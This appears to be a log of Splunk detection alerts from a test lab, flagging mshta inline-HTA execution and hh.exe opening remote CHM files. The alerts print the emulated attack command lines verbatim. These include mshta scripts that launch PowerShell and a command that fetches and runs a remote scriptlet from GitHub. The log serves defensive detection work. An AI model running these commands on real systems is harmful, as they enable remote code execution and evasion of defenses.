1657741163, search_name="ESCU - Detect mshta inline hta execution - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:57", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:57", original_file_name="unknown", parent_process="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", parent_process_name="WmiPrvSE.exe", process="\"C:\\Windows\\system32\\mshta.exe\" \"about:<hta:application><script language=\"JScript\">a=new%20ActiveXObject(\"WScript.Shell\");a.Run(\"powershell.exe%20-nop%20-Command%20Write-Host%2023aa97c3-2d1e-46ec-a7aa-b62426241201;%20Start-Sleep%20-Seconds%202;%20exit\",0,true);close();</script>'\"", process_name="mshta.exe", risk_message="An instance of WmiPrvSE.exe spawning mshta.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator executing with inline HTA, indicative of defense evasion.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="90.0", savedsearch_description="The following analytic identifies \"mshta.exe\" execution with inline protocol handlers. \"JavaScript\", \"VBScript\", and \"About\" are the only supported options when invoking HTA content directly on the command-line. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"mshta.exe\" and its parent process.", threat_object="WmiPrvSE.exe", threat_object="mshta.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1657741163, search_name="ESCU - Detect mshta inline hta execution - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:57", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:57", original_file_name="unknown", parent_process="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", parent_process_name="WmiPrvSE.exe", process="\"C:\\Windows\\system32\\mshta.exe\" \"about:<hta:application><script language=\"JScript\">a=new%20ActiveXObject(\"WScript.Shell\");a.Run(\"powershell.exe%20-nop%20-Command%20Write-Host%2023aa97c3-2d1e-46ec-a7aa-b62426241201;%20Start-Sleep%20-Seconds%202;%20exit\",0,true);close();</script>'\"", process_name="mshta.exe", risk_message="An instance of WmiPrvSE.exe spawning mshta.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator executing with inline HTA, indicative of defense evasion.", risk_object="Administrator", risk_object_type="user", risk_score="90.0", savedsearch_description="The following analytic identifies \"mshta.exe\" execution with inline protocol handlers. \"JavaScript\", \"VBScript\", and \"About\" are the only supported options when invoking HTA content directly on the command-line. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"mshta.exe\" and its parent process.", threat_object="WmiPrvSE.exe", threat_object="mshta.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1657741163, search_name="ESCU - Detect mshta inline hta execution - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="3", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:36", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:03", original_file_name="MSHTA.EXE", parent_process="\"cmd.exe\" /c \"mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell -noexit -file C:\\AtomicRedTeam\\atomics\\T1218.005\\src\\powershell.ps1\"\":close\")\"", parent_process="\"cmd.exe\" /c \"mshta.exe \"about:&lt;hta:application&gt;&lt;script language=\"VBScript\"&gt;Close(Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run%20\"\"powershell.exe%20-nop%20-Command%20Write-Host%20Hello,%20MSHTA!;Start-Sleep%20-Seconds%205\"\"\"))&lt;/script&gt;'\"\"", parent_process="\"cmd.exe\" /c \"mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();\"", parent_process_name="cmd.exe", process="mshta  vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell -noexit -file C:\\AtomicRedTeam\\atomics\\T1218.005\\src\\powershell.ps1\"\":close\")", process="mshta.exe  \"about:&lt;hta:application&gt;&lt;script language=\"VBScript\"&gt;Close(Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run%%20\"\"powershell.exe%%20-nop%%20-Command%%20Write-Host%%20Hello,%%20MSHTA!;Start-Sleep%%20-Seconds%%205\"\"\"))&lt;/script&gt;'\"", process="mshta.exe  javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();", process_name="mshta.exe", risk_message="An instance of cmd.exe spawning mshta.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator executing with inline HTA, indicative of defense evasion.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="90.0", savedsearch_description="The following analytic identifies \"mshta.exe\" execution with inline protocol handlers. \"JavaScript\", \"VBScript\", and \"About\" are the only supported options when invoking HTA content directly on the command-line. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"mshta.exe\" and its parent process.", threat_object="cmd.exe", threat_object="mshta.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1657741163, search_name="ESCU - Detect mshta inline hta execution - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="3", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:36", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:03", original_file_name="MSHTA.EXE", parent_process="\"cmd.exe\" /c \"mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell -noexit -file C:\\AtomicRedTeam\\atomics\\T1218.005\\src\\powershell.ps1\"\":close\")\"", parent_process="\"cmd.exe\" /c \"mshta.exe \"about:&lt;hta:application&gt;&lt;script language=\"VBScript\"&gt;Close(Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run%20\"\"powershell.exe%20-nop%20-Command%20Write-Host%20Hello,%20MSHTA!;Start-Sleep%20-Seconds%205\"\"\"))&lt;/script&gt;'\"\"", parent_process="\"cmd.exe\" /c \"mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();\"", parent_process_name="cmd.exe", process="mshta  vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell -noexit -file C:\\AtomicRedTeam\\atomics\\T1218.005\\src\\powershell.ps1\"\":close\")", process="mshta.exe  \"about:&lt;hta:application&gt;&lt;script language=\"VBScript\"&gt;Close(Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run%%20\"\"powershell.exe%%20-nop%%20-Command%%20Write-Host%%20Hello,%%20MSHTA!;Start-Sleep%%20-Seconds%%205\"\"\"))&lt;/script&gt;'\"", process="mshta.exe  javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();", process_name="mshta.exe", risk_message="An instance of cmd.exe spawning mshta.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator executing with inline HTA, indicative of defense evasion.", risk_object="Administrator", risk_object_type="user", risk_score="90.0", savedsearch_description="The following analytic identifies \"mshta.exe\" execution with inline protocol handlers. \"JavaScript\", \"VBScript\", and \"About\" are the only supported options when invoking HTA content directly on the command-line. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"mshta.exe\" and its parent process.", threat_object="cmd.exe", threat_object="mshta.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1657741163, search_name="ESCU - Detect mshta inline hta execution - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:57", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:57", original_file_name="MSHTA.EXE", parent_process="C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", parent_process_name="WmiPrvSE.exe", process="\"C:\\Windows\\system32\\mshta.exe\" \"about:&lt;hta:application&gt;&lt;script language=\"JScript\"&gt;a=new%%20ActiveXObject(\"WScript.Shell\");a.Run(\"powershell.exe%%20-nop%%20-Command%%20Write-Host%%2023aa97c3-2d1e-46ec-a7aa-b62426241201;%%20Start-Sleep%%20-Seconds%%202;%%20exit\",0,true);close();&lt;/script&gt;'\"", process_name="mshta.exe", risk_message="An instance of WmiPrvSE.exe spawning mshta.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator executing with inline HTA, indicative of defense evasion.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="90.0", savedsearch_description="The following analytic identifies \"mshta.exe\" execution with inline protocol handlers. \"JavaScript\", \"VBScript\", and \"About\" are the only supported options when invoking HTA content directly on the command-line. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"mshta.exe\" and its parent process.", threat_object="WmiPrvSE.exe", threat_object="mshta.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1657741163, search_name="ESCU - Detect mshta inline hta execution - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:57", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:57", original_file_name="MSHTA.EXE", parent_process="C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", parent_process_name="WmiPrvSE.exe", process="\"C:\\Windows\\system32\\mshta.exe\" \"about:&lt;hta:application&gt;&lt;script language=\"JScript\"&gt;a=new%%20ActiveXObject(\"WScript.Shell\");a.Run(\"powershell.exe%%20-nop%%20-Command%%20Write-Host%%2023aa97c3-2d1e-46ec-a7aa-b62426241201;%%20Start-Sleep%%20-Seconds%%202;%%20exit\",0,true);close();&lt;/script&gt;'\"", process_name="mshta.exe", risk_message="An instance of WmiPrvSE.exe spawning mshta.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator executing with inline HTA, indicative of defense evasion.", risk_object="Administrator", risk_object_type="user", risk_score="90.0", savedsearch_description="The following analytic identifies \"mshta.exe\" execution with inline protocol handlers. \"JavaScript\", \"VBScript\", and \"About\" are the only supported options when invoking HTA content directly on the command-line. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"mshta.exe\" and its parent process.", threat_object="WmiPrvSE.exe", threat_object="mshta.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1657741071, search_name="ESCU - Detect HTML Help URL in Command Line - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 90, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:18", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:18", original_file_name="unknown", parent_process="C:\\Windows\\System32\\cmd.exe", parent_process_id="0x1820", process="C:\\Windows\\hh.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm", process_id="0x126c", process_name="hh.exe", risk_message="An instance of $parent_proces_name$ spawning hh.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator contacting a remote destination to potentally download a malicious payload.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="90.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file from a remote url. This particular technique will load Windows script code from a compiled help file. CHM files may  contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review reputation of remote IP and domain. Some instances, it is worth decompiling the .chm file to review its original contents. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="hh.exe", threat_object_type="process", user="Administrator"
1657741071, search_name="ESCU - Detect HTML Help URL in Command Line - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 90, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:18", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:18", original_file_name="unknown", parent_process="C:\\Windows\\System32\\cmd.exe", parent_process_id="0x1820", process="C:\\Windows\\hh.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm", process_id="0x126c", process_name="hh.exe", risk_message="An instance of $parent_proces_name$ spawning hh.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator contacting a remote destination to potentally download a malicious payload.", risk_object="Administrator", risk_object_type="user", risk_score="90.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file from a remote url. This particular technique will load Windows script code from a compiled help file. CHM files may  contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review reputation of remote IP and domain. Some instances, it is worth decompiling the .chm file to review its original contents. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="hh.exe", threat_object_type="process", user="Administrator"
1657741071, search_name="ESCU - Detect HTML Help URL in Command Line - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 90, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:18", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:18", original_file_name="HH.exe", parent_process="\"cmd.exe\" /c \"hh.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm\"", parent_process_id="6176", process="hh.exe  https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm", process_id="4716", process_name="hh.exe", risk_message="An instance of $parent_proces_name$ spawning hh.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator contacting a remote destination to potentally download a malicious payload.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="90.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file from a remote url. This particular technique will load Windows script code from a compiled help file. CHM files may  contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review reputation of remote IP and domain. Some instances, it is worth decompiling the .chm file to review its original contents. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="hh.exe", threat_object_type="process", user="Administrator"
1657741071, search_name="ESCU - Detect HTML Help URL in Command Line - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 90, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:18", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:18", original_file_name="HH.exe", parent_process="\"cmd.exe\" /c \"hh.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm\"", parent_process_id="6176", process="hh.exe  https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm", process_id="4716", process_name="hh.exe", risk_message="An instance of $parent_proces_name$ spawning hh.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator contacting a remote destination to potentally download a malicious payload.", risk_object="Administrator", risk_object_type="user", risk_score="90.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file from a remote url. This particular technique will load Windows script code from a compiled help file. CHM files may  contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review reputation of remote IP and domain. Some instances, it is worth decompiling the .chm file to review its original contents. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="hh.exe", threat_object_type="process", user="Administrator"
1657741057, search_name="ESCU - Detect HTML Help Spawn Child Process - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:24", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:24", parent_process="unknown", parent_process_id="6064", process="unknown", process_id="8036", process_name="powershell.exe", risk_message="An instance of $parent_process_name$ spawning powershell.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator spawning a child process, typically not normal behavior.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="powershell.exe", threat_object_type="process", user="Administrator"
